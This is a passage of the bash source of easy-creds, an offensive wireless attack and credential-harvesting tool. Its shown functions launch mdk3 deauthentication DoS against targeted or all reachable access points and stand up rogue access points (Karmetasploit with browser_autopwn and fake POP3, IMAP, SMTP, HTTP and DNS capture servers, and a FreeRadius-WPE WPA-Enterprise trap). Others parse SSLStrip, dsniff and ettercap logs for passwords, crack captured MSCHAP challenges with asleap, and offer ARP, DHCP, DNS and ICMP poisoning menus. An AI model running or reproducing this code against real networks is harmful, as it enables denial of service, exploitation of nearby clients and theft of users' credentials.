easy-creds -t MDK3-DoS -X screen mdk3 $dosmon d -b /tmp/ec/ec-dosap else xterm -geometry "$width"x$height+$x-$y -T "MDK3 AP DoS" -e mdk3 $dosmon d -b /tmp/ec/ec-dosap & fi echo $! > /tmp/dosap-pid sleep 5m && kill $(cat /tmp/ec/dosap-pid) & echo $! > /tmp/ec/sleep.pid echo -e "\n\e[1;33m[*] Attack will run for 5 minutes or you can close the xterm window to stop the AP DoS attack...\e[0m" else f_getbssids fi } ################################################## f_lastman(){ clear f_Banner dosattack=1 echo -e "\n\e[1;33m[*] This attack will DoS every AP BSSID & Client MAC it can reach.\e[0m\n\e[1;31mUse with extreme caution\e[0m\n\n" # grep the MACs to a temp white list ifconfig | grep wlan| grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' > /tmp/ec/ec-white.lst airmon-ng | egrep '(wlan|mon)' | sed '$a\\n' doswlan= while [ -z $doswlan ];do read -p "Please enter the wireless device to use for DoS attack: " doswlan; done phyint=$(airmon-ng | grep $doswlan | sed -n "s/.*\([[].*[]]\).*/\1/;s/[[]//;s/[]]//p;") echo -e "\nPlacing the wireless card in monitor mode to perform DoS attack." airmon-ng start $doswlan & sleep 3 dosmon=$(airmon-ng | sed -n "s/.*\(mon.*$phyint\).*/\1/p;" | cut -f1) echo -e "\nUsing $dosmon for attack." if [ -z $isxrunning ]; then screen -S easy-creds -t Last-Man-Standing -X screen mdk3 $dosmon d -w /tmp/ec/ec-white.lst;(airmon-ng stop $dosmon >/dev/null) else xterm -geometry 70x10+0-0 -T "Last Man Standing" -e mdk3 $dosmon d -w /tmp/ec/ec-white.lst;(airmon-ng stop $dosmon >/dev/null) & fi echo $! > /tmp/ec/dosap-pid sleep 5m && kill $(cat /tmp/ec/dosap-pid) & echo $! > /tmp/ec/sleep.pid airmon-ng stop $dosmon >/dev/null echo -e "\n\e[1;33m[*] Attack will run for 5 minutes or you can close the xterm window to stop the AP DoS attack...\e[0m" sleep 7 } ################################################## f_getbssids(){ clear f_Banner echo -e "\n\e[1;33m[*] This will launch airodump-ng and allow you to specify the AP to DoS\e[0m\n" airmon-ng | grep wlan | sed '$a\\n' airowlan= while [ -z $airowlan ];do read -p "Please enter the wireless device to use for DoS attack: " airowlan; done phyint=$(airmon-ng | grep $airowlan | sed -n "s/.*\([[].*[]]\).*/\1/;s/[[]//;s/[]]//p;") echo -e "\nPlacing the wireless card in monitor mode to perform DoS attack." airmon-ng start $airowlan > /dev/null & sleep 3 airomon=$(airmon-ng | sed -n "s/.*\(mon.*$phyint\).*/\1/p;" | cut -f1) echo -e "\n\e[1;33m[*] Starting airodump-ng with $airomon, [ctrl+c] in the window when you see the ESSID(s) you want to attack.\e[0m\n" if [ -z $isxrunning ]; then screen -S easy-creds -t Airodump -X screen $airodumppath/airodump-ng $airomon -w /tmp/ec/airodump-ec --output-format csv else xterm -geometry 90x25+0+0 -T "Airodump" -e $airodumppath/airodump-ng $airomon -w /tmp/ec/airodump-ec --output-format csv & fi echo $! > /tmp/ec/airodump-pid #wait for the process to die while [ ! -z $(ps -p "$(cat /tmp/ec/airodump-pid)" | grep "$(cat /tmp/ec/airodump-pid)" | sed 's/ //g') ]; do sleep 3; done sleep 3 #sometimes the mon interface doesn't transition properly after airodump, decided to stop the interface and restart it clean airmon-ng stop $airomon &> /dev/null echo -e "\n\e[1;33m[*] The following APs were identified:\e[0m\n" #IFS variable allows for spaces in the name of the ESSIDs and will still display it on one line SAVEIFS=$IFS IFS=$(echo -en "\n\b") for apname in $(cat /tmp/ec/airodump-ec-01.csv | egrep -a '(OPN|MGT|WEP|WPA)'| cut -d "," -f14| sort -u);do echo [*] "$apname" done echo IFS=$SAVEIFS dosapname= while [ -z $dosapname ]; do read -p "Please enter the ESSID you'd like to attack: " dosapname done cat /tmp/ec/airodump-ec-01.csv | egrep -a '(OPN|MGT|WEP|WPA)'| grep -a -i "$dosapname" |cut -d "," -f1 > /tmp/ec/ec-macs rm /tmp/ec/airodump-ec* #Make sure none of your MACs end up in the blacklist diff -i /tmp/ec/ec-macs /tmp/ec/ec-white.lst | grep -v ">"|grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' > /tmp/ec/ec-dosap echo -e "\nNow Deauthing clients from $dosapname.\n\nIf there is more than one BSSID, all will be attacked...\n" airmon-ng start $airowlan &> /dev/null sleep 3 if [ -z $isxrunning ]; then screen -S easy-creds -t MDK3-AP-DoS -X screen mdk3 $airomon d -b /tmp/ec/ec-dosap;(airmon-ng stop $airomon >/dev/null) echo -e "\n Exit the MDK3-AP-DoS in the easy-creds session to stop the attack" sleep 5 else xterm -geometry 70x10+0-0 -T "MDK3 AP DoS" -e mdk3 $airomon d -b /tmp/ec/ec-dosap;(airmon-ng stop $airomon >/dev/null) & echo -e "\nPlease close the xterm window to stop the attack..." sleep 5 fi } ################################################## f_KarmaAttack(){ wireless=1 karmasploit=1 # Credit to Metasploit Unleashed, used as a base clear f_Banner f_xtermwindows echo -e "Network Interfaces:\n" ifconfig | awk '/Link encap:Eth/ {print;getline;print}' | sed '{ N; s/\n/ /; s/Link en.*.HWaddr//g; s/ Bcast.*//g; s/UP.*.:1//g; s/inet addr/IP/g; }' | sed '$a\\n' while [ -z $IFACE ]; do read -p "Interface connected to the internet, example eth0: " IFACE; done airmon-ng while [ -z $WIFACE ]; do read -p "Wireless interface name, example wlan0: " WIFACE; done airmon-ng start $WIFACE &> /dev/null modprobe tun echo -e "\n\e[1;33m[*] Your interface has now been placed in Monitor Mode\e[0m\n" airmon-ng | grep mon | sed '$a\\n' MONMODE= while [ -z $MONMODE ]; do read -p "Enter your monitor enabled interface name (ex. mon0): " MONMODE; done TUNIFACE= while [ -z $TUNIFACE ]; do read -p "Enter your tunnel interface (ex. at0): " TUNIFACE; done f_karmadhcp f_karmasetup f_karmafinal f_mainmenu } ################################################## f_karmadhcp(){ ATCIDR= while [ -z $ATCIDR ]; do read -p "Network range for your tunneled interface, example " ATCIDR; done ATDNS= while [ -z $ATDNS ]; do read -p "Enter the IP address for the DNS server, example " ATDNS; done f_ipcalc } ################################################## f_karmasetup(){ echo "use auxiliary/server/browser_autopwn" >> /tmp/ec/karma.rc echo "setg AUTOPWN_HOST $ATIP" >> /tmp/ec/karma.rc echo "setg AUTOPWN_PORT 55550" >> /tmp/ec/karma.rc echo "setg AUTOPWN_URI /ads" >> /tmp/ec/karma.rc echo "set LHOST $ATIP" >> /tmp/ec/karma.rc echo "set LPORT 45000" >> /tmp/ec/karma.rc echo "set SRVPORT 55550" >> /tmp/ec/karma.rc echo "set URIPATH /ads" >> /tmp/ec/karma.rc echo "run" >> /tmp/ec/karma.rc echo "use auxiliary/server/capture/pop3" >> /tmp/ec/karma.rc echo "set SRVPORT 110" >> /tmp/ec/karma.rc echo "set SSL false" >> /tmp/ec/karma.rc echo "run" >> /tmp/ec/karma.rc echo "use auxiliary/server/capture/pop3" >> /tmp/ec/karma.rc echo "set SRVPORT 995" >> /tmp/ec/karma.rc echo "set SSL true" >> /tmp/ec/karma.rc echo "run" >> /tmp/ec/karma.rc echo "use auxiliary/server/capture/ftp" >> /tmp/ec/karma.rc echo "run" >> /tmp/ec/karma.rc echo "use auxiliary/server/capture/imap" >> /tmp/ec/karma.rc echo "set SSL false" >> /tmp/ec/karma.rc echo "set SRVPORT 143" >> /tmp/ec/karma.rc echo "run" >> /tmp/ec/karma.rc echo "use auxiliary/server/capture/imap" >> /tmp/ec/karma.rc echo "set SSL true" >> /tmp/ec/karma.rc echo "set SRVPORT 993" >> /tmp/ec/karma.rc echo "run" >> /tmp/ec/karma.rc echo "use auxiliary/server/capture/smtp" >> /tmp/ec/karma.rc echo "set SSL false" >> /tmp/ec/karma.rc echo "set SRVPORT 25" >> /tmp/ec/karma.rc echo "run" >> /tmp/ec/karma.rc echo "use auxiliary/server/capture/smtp" >> /tmp/ec/karma.rc echo "set SSL true" >> /tmp/ec/karma.rc echo "set SRVPORT 465" >> /tmp/ec/karma.rc echo "run" >> /tmp/ec/karma.rc echo "use auxiliary/server/fakedns" >> /tmp/ec/karma.rc echo "unset TARGETHOST" >> /tmp/ec/karma.rc echo "set SRVPORT 5353" >> /tmp/ec/karma.rc echo "run" >> /tmp/ec/karma.rc echo "use auxiliary/server/fakedns" >> /tmp/ec/karma.rc echo "unset TARGETHOST" >> /tmp/ec/karma.rc echo "set SRVPORT 53" >> /tmp/ec/karma.rc echo "run" >> /tmp/ec/karma.rc echo "use auxiliary/server/capture/http" >> /tmp/ec/karma.rc echo "set SRVPORT 80" >> /tmp/ec/karma.rc echo "set SSL false" >> /tmp/ec/karma.rc echo "run" >> /tmp/ec/karma.rc echo "use auxiliary/server/capture/http" >> /tmp/ec/karma.rc echo "set SRVPORT 8080" >> /tmp/ec/karma.rc echo "set SSL false" >> /tmp/ec/karma.rc echo "run" >> /tmp/ec/karma.rc echo "use auxiliary/server/capture/http" >> /tmp/ec/karma.rc echo "set SRVPORT 443" >> /tmp/ec/karma.rc echo "set SSL true" >> /tmp/ec/karma.rc echo "run" >> /tmp/ec/karma.rc echo "use auxiliary/server/capture/http" >> /tmp/ec/karma.rc echo "set SRVPORT 8443" >> /tmp/ec/karma.rc echo "set SSL true" >> /tmp/ec/karma.rc echo "run" >> /tmp/ec/karma.rc } ################################################## f_karmafinal(){ echo -e "\n\e[1;33m[*] Launching Airbase...\e[0m" # airbase-ng is going to create our fake AP with the SSID default if [ -z $isxrunning ]; then screen -dmS easy-creds -t Airbase-NG airbase-ng -P -C 60 -e default $MONMODE else xterm -geometry "$width"x$height-$x+$y -T "Airbase-NG" -e airbase-ng -P -C 60 -e "default" $MONMODE & fi echo $! > /tmp/ec/ec-karma-pid sleep 7 echo -e "\n\e[1;33m[*] Configuring tunneled interface.\e[0m" ifconfig $TUNIFACE up ifconfig $TUNIFACE $ATIP netmask $ATSUB ifconfig $TUNIFACE mtu 1400 route add -net $ATNET netmask $ATSUB gw $ATIP dev $TUNIFACE sleep 3 echo -e "\n\e[1;33m[*] Setting up iptables to handle traffic seen by the tunneled interface.\e[0m" iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE sleep 3 #Blackhole Routing - Forces clients to go through attacker even if they have cached DNS entries iptables -t nat -A PREROUTING -i $TUNIFACE -j REDIRECT echo -e "\n\e[1;33m[*] Launching Tail...\e[0m" if [ -z $isxrunning ]; then screen -S easy-creds -t DMESG -X screen tail -f /var/log/messages else y=$(($y+$yoffset)) xterm -geometry "$width"x$height-$x+$y -T "DMESG" -bg black -fg red -e tail -f /var/log/messages & fi echo $! > /tmp/ec/tail.pid sleep 3 echo -e "\n\e[1;33m[*] DHCP server starting on tunneled interface.\e[0m\n" if [ -e /etc/dhcp3/dhcpd.conf ]; then dhcpd3 -q -cf $DHCPPATH -pf /var/run/dhcp3-server/dhcpd.pid $TUNIFACE & elif [ -e /etc/sysconfig/dhcpd ]; then systemctl start dhcpd.service else service dhcpd start fi sleep 3 if [ -z $isxrunning ]; then echo -e "\n\e[1;33m[*] Launching Karmetasploit in screen. Once it loads press ctrl-a then d return to this window.\e[0m\n" sleep 5 screen -S Karmetasploit -t msfconsole msfconsole -r /tmp/ec/karma.rc else echo -e "\n\e[1;33m[*] Launching Karmetasploit, this may take a little bit...\e[0m\n" y=$(($y+$yoffset)) xterm -geometry "$width"x$height-$x+$y -bg black -fg white -T "Karmetasploit" -e msfconsole -r /tmp/ec/karma.rc & echo $! > /tmp/ec/ec-metasploit-pid fi #Enable IP forwarding echo "1" > /proc/sys/net/ipv4/ip_forward echo -e "\n\e[1;33m[*] Do you ever imagine things in the garden of your mind?\e[0m" sleep 5 } ################################################## f_freeradiusattack(){ clear f_Banner fra=1 atheroscard=$(lsmod | grep -c 'ath') if [ -z $atheroscard ]; then echo -e "\n\e[1;31m[-] I could not find and Atheros wireless card.\nAttack only works with an atheros chipset...\e[0m\n" sleep 5 fi mv $pathtoradiusconf/radiusd.conf $pathtoradiusconf/radiusd.conf.back mv $pathtoradiusconf/clients.conf $pathtoradiusconf/clients.conf.back if [ -e $pathtoradiusconf ]; then cat $pathtoradiusconf/radiusd.conf.back | sed -e '/^proxy_request/s/yes/no/' -e 's/\$INCLUDE proxy.conf/#\$INCLUDE proxy.conf/' > $pathtoradiusconf/radiusd.conf else while [! -e $pathtoradiusconf ] && [ -z $pathtoradiusconf ]; do echo -e "\n\e[1;31m[-] I cannot find your radius.conf file, please provide the path\e[0m" read -e -p ": " pathtoradiusconf done cat "$pathtoradiusconf" | sed -e '/^proxy_request/s/yes/no/' -e 's/\$INCLUDE proxy.conf/#\$INCLUDE proxy.conf/' > $pathtoradiusconf/radiusd.conf fi radiussecret= while [ -z $radiussecret ]; do read -p "Please enter the shared secret you'd like to use for the radius connection: " radiussecret done echo f_buildclientsconf f_hostapd f_freeradiusfinal f_mainmenu } ################################################## f_buildclientsconf(){ echo "client localhost {" > $pathtoradiusconf/clients.conf echo " ipaddr =" >> $pathtoradiusconf/clients.conf echo " secret = $radiussecret" >> $pathtoradiusconf/clients.conf echo " require_message_authenticator = no" >> $pathtoradiusconf/clients.conf echo " nastype = other" >> $pathtoradiusconf/clients.conf echo "}" >> $pathtoradiusconf/clients.conf echo "client {" >> $pathtoradiusconf/clients.conf echo " secret = $radiussecret" >> $pathtoradiusconf/clients.conf echo " shortname = testAP" >> $pathtoradiusconf/clients.conf echo "}" >> $pathtoradiusconf/clients.conf echo "client {" >> $pathtoradiusconf/clients.conf echo " secret = $radiussecret" >> $pathtoradiusconf/clients.conf echo " shortname = testAP" >> $pathtoradiusconf/clients.conf echo "}" >> $pathtoradiusconf/clients.conf echo "client {" >> $pathtoradiusconf/clients.conf echo " secret = $radiussecret" >> $pathtoradiusconf/clients.conf echo " shortname = testAP" >> $pathtoradiusconf/clients.conf echo "}" >> $pathtoradiusconf/clients.conf # echo "client $ATCIDR {" >> $pathtoradiusconf/clients.conf # echo " secret = $radiussecret" >> $pathtoradiusconf/clients.conf # echo " shortname = testAP" >> $pathtoradiusconf/clients.conf # echo "}" >> $pathtoradiusconf/clients.conf } ################################################## f_hostapd(){ airmon-ng | grep 'wlan' radwiface= while [ -z $radwiface ]; do echo -en "\nPlease enter your wirless interface for the attack (ex: wlan0)" read -p " : " radwiface done radssid= while [ -z $radssid ]; do echo -en "\nPlease enter SSID you'd like to use for the attack (ex: FreeWifi)" read -p " : " radssid done radchannel= while [ -z $radchannel ]; do echo -en "\nPlease enter the channel you'd like to use for the attack" read -p " : " radchannel done echo "interface=$radwiface" > /tmp/ec/ec-hostapd.conf echo "driver=nl80211" >> /tmp/ec/ec-hostapd.conf echo "ssid=$radssid" >> /tmp/ec/ec-hostapd.conf echo "logger_stdout=-1" >> /tmp/ec/ec-hostapd.conf echo "logger_stdout_level=0" >> /tmp/ec/ec-hostapd.conf echo "dump_file=/tmp/hostapd.dump" >> /tmp/ec/ec-hostapd.conf echo "ieee8021x=1" >> /tmp/ec/ec-hostapd.conf echo "eapol_key_index_workaround=0" >> /tmp/ec/ec-hostapd.conf echo "own_ip_addr=" >> /tmp/ec/ec-hostapd.conf echo "auth_server_addr=" >> /tmp/ec/ec-hostapd.conf echo "auth_server_port=1812" >> /tmp/ec/ec-hostapd.conf echo "auth_server_shared_secret=$radiussecret" >> /tmp/ec/ec-hostapd.conf echo "wpa=1" >> /tmp/ec/ec-hostapd.conf echo "hw_mode=g" >> /tmp/ec/ec-hostapd.conf echo "channel=$radchannel" >> /tmp/ec/ec-hostapd.conf echo "wpa_pairwise=TKIP CCMP" >> /tmp/ec/ec-hostapd.conf echo "wpa_key_mgmt=WPA-EAP" >> /tmp/ec/ec-hostapd.conf } f_freeradiusfinal(){ echo -e "\n\e[1;33m[*] Launching the FreeRadius server...\e[0m\n" if [ ! -z $isxrunning ]; then xterm -geometry "$width"x$height-$x+$y -T "radiusd" -bg white -fg black -e radiusd -X -f & echo $! > /tmp/ec/freeradius.pid sleep 3 else screen -dmS FreeRadius -t radiusd $pathtoradiusd/radiusd -X -f echo $! > /tmp/ec/freeradius.pid fi echo -e "\n\e[1;33m[*] Launching hostapd...\e[0m\n" sleep 3 if [ ! -z $isxrunning ]; then y=$(($y+$yoffset)) xterm -geometry "$width"x$height-$x+$y -T "hostapd" -bg black -fg white -e $pathtohostapd/hostapd /tmp/ec/ec-hostapd.conf & sleep 3 else screen -S FreeRadius -t hostapd -X screen $pathtohostapd/hostapd /tmp/ec/ec-hostapd.conf echo $! > /tmp/ec/hostapd.pid fi if [ ! -e $freeradiuslog ]; then touch $findradiuslog/freeradius-server-wpe.log freeradiuslog=$findradiuslog/freeradius-server-wpe.log fi echo -e "\n\e[1;33m[*] Launching credential log file...\e[0m\n" sleep 3 if [ ! -z $isxrunning ]; then y=$(($y+$yoffset)) xterm -geometry "$width"x$height-$x+$y -T "credentials" -bg black -fg green -hold -l -lf $logfldr/freeradius-creds-$(date +%F-%H%M).txt -e tail -f $freeradiuslog & echo $! > /tmp/ec/tail.pid sleep 3 else screen -S FreeRadius -t credentials -X screen tail -f $freeradiuslog/freeradius-server-wpe.log screen -S easy-creds -X select 2 screen -S easy-creds -X logfile $logfldr/freeradius-creds-$(date +%F-%H%M).txt screen -S easy-creds -X log echo $! > /tmp/ec/tail.pid fi tshark -i $radwiface -w $logfldr/freeradius-creds-$(date +%F-%H%M).dump &> /dev/null & echo $! > /tmp/ec/tshark.pid } ################################################## # # DATA REVIEW FUNCTIONS # ################################################## f_SSLStrip(){ clear f_Banner if [ -d $logfldr ]; then echo "SSLStrip logs in current log folder:" ls $logfldr/sslstrip* 2>/dev/null echo -e "\n\n" fi if [ -e /$PWD/strip-accts.txt ]; then rm /$PWD/strip-accts.txt; fi # Coded with help from 'Crusty Old Fart' - Ubuntu Forums LOGPATH= while [ -z $LOGPATH ] || [ ! -f "$LOGPATH" ]; do read -e -p "Enter the full path to your SSLStrip log file: " LOGPATH; done DEFS= while [ -z $DEFS ] || [ ! -e "$DEFS" ]; do read -e -p "Enter the full path to your definitions file [/pentest/sniffers/easy-creds/definitions.sslstrip]: " DEFS if [ -z $DEFS ]; then DEFS="/pentest/sniffers/easy-creds/definitions.sslstrip"; fi done NUMLINES=$(cat "$DEFS" | wc -l) i=1 while [ $i -le "$NUMLINES" ]; do VAL1=$(awk -v k=$i 'FNR == k {print $1}' "$DEFS") VAL2=$(awk -v k=$i 'FNR == k {print $2}' "$DEFS") VAL3=$(awk -v k=$i 'FNR == k {print $3}' "$DEFS") VAL4=$(awk -v k=$i 'FNR == k {print $4}' "$DEFS") GREPSTR="$(grep -a $VAL2 "$LOGPATH" | grep -a $VAL3 | grep -a $VAL4)" if [ "$GREPSTR" ]; then echo -n "$VAL1" "- " >> /$PWD/strip-accts.txt echo "$GREPSTR" | \ sed -e 's/.*'$VAL3'=/'$VAL3'=/' -e 's/&/ /' -e 's/&.*//' >> /$PWD/strip-accts.txt fi i=$[$i+1] done if [ -s /$PWD/strip-accts.txt ] && [ -z $isxrunning ]; then cat /$PWD/strip-accts.txt | less elif [ -s /$PWD/strip-accts.txt ] && [ ! -z $isxrunning ]; then xterm -geometry 80x24-0+0 -T "SSLStrip Accounts" -hold -bg white -fg black -e cat /$PWD/strip-accts.txt & else echo -e "\n\e[1;31m[-] Sorry no credentials captured...\e[0m" fi } ####################################################### f_dsniff(){ clear f_Banner if [ -d $logfldr ]; then echo "Dsniff logs in current log folder:" ls $logfldr/ 2>/dev/null echo -e "\n\n" fi DSNIFFPATH= while [ -z $DSNIFFPATH ] || [ ! -f "$DSNIFFPATH" ]; do read -e -p "Enter the path for your dsniff Log file: " DSNIFFPATH done dsniff -r $DSNIFFPATH >> /$PWD/dsniff-log.txt if [ -z $isxrunning ];then cat /$PWD/dnsiff-log.txt | less else xterm -hold -bg blue -fg white -geometry 80x24-0+0 -T "Dsniff Accounts" -e cat /$PWD/dsniff-log.txt & fi } ################################################## f_EtterLog(){ clear f_Banner if [ -d $logfldr ]; then echo "Ettercap logs in current log folder:" ls $logfldr/*.eci 2>/dev/null echo -e "\n\n" fi ETTERECI= while [ -z $ETTERECI ] || [ ! -f "$ETTERECI" ]; do read -e -p "Enter the full path to your ettercap.eci log file: " ETTERECI; done etterlog -p "$ETTERECI" >> /$PWD/etterlog.txt if [ -z $isxrunning ]; then cat /$PWD/etterlog.txt | less else xterm -hold -bg blue -fg white -geometry 80x24-0+0 -T "Ettercap Accounts" -e cat /$PWD/etterlog.txt & fi } ################################################## f_freeradiuscreds(){ while [ -z "$credlist" ] && [ ! -e "$credlist" ]; do echo -n -e "\nPlease enter the path to your FreeRadius Attack credential list" read -e -p ": " credlist done while [ -z "$wordlist" ] && [ ! -e "$wordlist" ]; do echo -n -e "\nPlease enter the path to your wordlist" read -e -p ": " wordlist done echo -n -e "\n\e[1;33m[*] Please standby, this may take a while...\e[0m" acreds="$PWD/asleap-creds-$(date +%F-%H%M).txt" touch $acreds cat $credlist|egrep 'username|challenge|response'| cut -d " " -f2 > /tmp/ec/freeradius-creds.tmp NUMLINES=$(cat /tmp/ec/freeradius-creds.tmp | wc -l) i=1 while [ $i -le "$NUMLINES" ]; do username=$(awk NR==$i /tmp/ec/freeradius-creds.tmp) i=$[$i+1] challenge=$(awk NR==$i /tmp/ec/freeradius-creds.tmp|tr -d '\r') i=$[$i+1] response=$(awk NR==$i /tmp/ec/freeradius-creds.tmp|tr -d '\r') i=$[$i+1] echo "Username: $username" >> "$acreds" $asleappath/asleap -C $challenge -R $response -W $wordlist | grep "password:"| sed -e 's/[\t ]//g;/^$/d'| sed -e 's/:/: /g' >> "$acreds" echo >> $acreds done echo -n -e "\n\e[1;33m[*] Your cracked credentials can be found at $acreds...\e[0m" sleep 5 f_mainmenu } ################################################## # # MENU FUNCTIONS # ################################################## f_Banner(){ echo -e " ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ " echo -e "||\e[1;36me\e[0m |||\e[1;36ma\e[0m |||\e[1;36ms\e[0m |||\e[1;36my\e[0m |||\e[1;36m-\e[0m |||\e[1;36mc\e[0m |||\e[1;36mr\e[0m |||\e[1;36me\e[0m |||\e[1;36md\e[0m |||\e[1;36ms\e[0m ||" echo -e "||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||" echo -e "|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|" echo -e "\e[1;33m Version 3.7.3K - KALI of Your Mind\e[0m" echo echo -e "\e[1;33mAt any time,\e[0m \e[1;36mctrl+c\e[0m \e[1;33m to cancel and return to the main menu\e[0m" echo } ################################################## f_prereqs(){ clear f_Banner echo "1. Edit etter.conf" echo "2. Edit etter.dns" echo "3. Install dhcp3 server" echo "4. Install karmetasploit prereqs" echo "5. Add tunnel interface to dhcp3-server file" echo "6. Update Metasploit Framework" echo "7. Update Aircrack-ng" echo "8. Update SSLStrip" echo "9. How-to Videos (Launches Web Browser)" echo "10. Previous Menu" echo read -p "Choice: " prereqschoice case $prereqschoice in 1) f_nanoetter ;; 2) f_nanoetterdns ;; 3) f_dhcp3install ;; 4) f_karmareqs ;; 5) f_addtunnel ;; 6) f_msfupdate ;; 7) f_aircrackupdate ;; 8) f_sslstrip_vercheck ;; 9) f_howtos ;; 10) f_mainmenu ;; *) f_prereqs ;; esac } ################################################## f_poisoning(){ clear f_Banner echo "1. Create Victim Host List" echo "2. Standard ARP Poison" echo "3. Oneway ARP Poison" echo "4. DHCP Poison" echo "5. DNS Poison" echo "6. ICMP Poison" echo "7. Previous Menu" echo read -p "Choice: " poisoningchoice case $poisoningchoice in 1) f_HostScan ;; 2) f_Standard ;; 3) f_Oneway ;; 4) f_DHCPPoison ;; 5) f_DNSPoison ;; 6) f_ICMP ;; 7) f_mainmenu ;; *) f_poisoning ;; esac } ################################################## f_fakeapattacks(){ clear f_Banner echo "1. FakeAP Attack Static" echo "2. FakeAP Attack EvilTwin" echo "3. Karmetasploit Attack" echo "4. FreeRadius Attack" echo "5. DoS AP Options" echo "6. Previous Menu" echo read -p "Choice: " fapchoice case $fapchoice in 1) f_fakeapAttack ;; 2) f_fakeapeviltwin ;; 3) f_KarmaAttack ;; 4) f_freeradiusattack ;; 5) f_DoSOptions ;; 6) f_mainmenu ;; *) f_FakeAP-Menu ;; esac } ###################################################### f_DoSOptions(){ clear f_Banner echo "1. Attack a Single or Multiple APs" echo "2. Last Man Standing (Use with Caution)" echo "3. Previous Menu" echo read -p "Choice: " doschoice case $doschoice in 1) f_mdk3aps ;; 2) f_lastman ;; 3) f_fakeapattacks ;; *) f_DoSOptions ;; esac } ###################################################### f_DataReviewMenu(){ clear f_Banner echo "1. Parse SSLStrip log for credentials" echo "2. Parse dsniff file for credentials" echo "3. Parse ettercap eci file for credentials" echo "4. Parse freeradius attack file for credentials" echo "5. Previous Menu" echo read -p "Choice: " datareviewchoice case $datareviewchoice in 1) f_SSLStrip ;; 2) f_dsniff ;; 3) f_EtterLog ;; 4) f_freeradiuscreds ;; 5) f_mainmenu ;; *) f_DataReviewMenu ;; esac } ################################################## f_ICMP(){ clear f_Banner echo "\n*** If you are connected to a switch this attack won't work! ***" echo -e "*** You must be able to see ALL traffic for this attack to work. ***\n\n" read -p "Are you connected to a switch [y/N]: " icmpswitch if [ $(echo $icmpswitch | tr 'A-Z' 'a-z') == "y" ]; then f_ICMPPoison else f_poisoning fi } ################################################## f_mainmenu(){ clear f_Banner echo "1. Prerequisites & Configurations" echo "2. Poisoning Attacks" echo "3. FakeAP Attacks" echo "4. Data Review" echo "5. Exit" echo "q. Quit current poisoning session" echo read -p "Choice: " mainchoice case $mainchoice in 1) clean=; f_prereqs ;; 2) clean=; f_poisoning ;; 3) clean=; f_fakeapattacks ;; 4) clean=; f_DataReviewMenu ;; 5) f_checkexit ;; 1968) f_pbs ;; Q|q) f_Quit ;; *) f_mainmenu ;; esac } # run as root if [ "$(id -u)" != "0" ]; then echo -e "\e[1;31m[!] This script must be run as root\e[0m" 1>&2 exit 1 else mkdir /tmp/ec f_isxrunning f_xtermwindows f_findpaths clean=1 f_mainmenu fi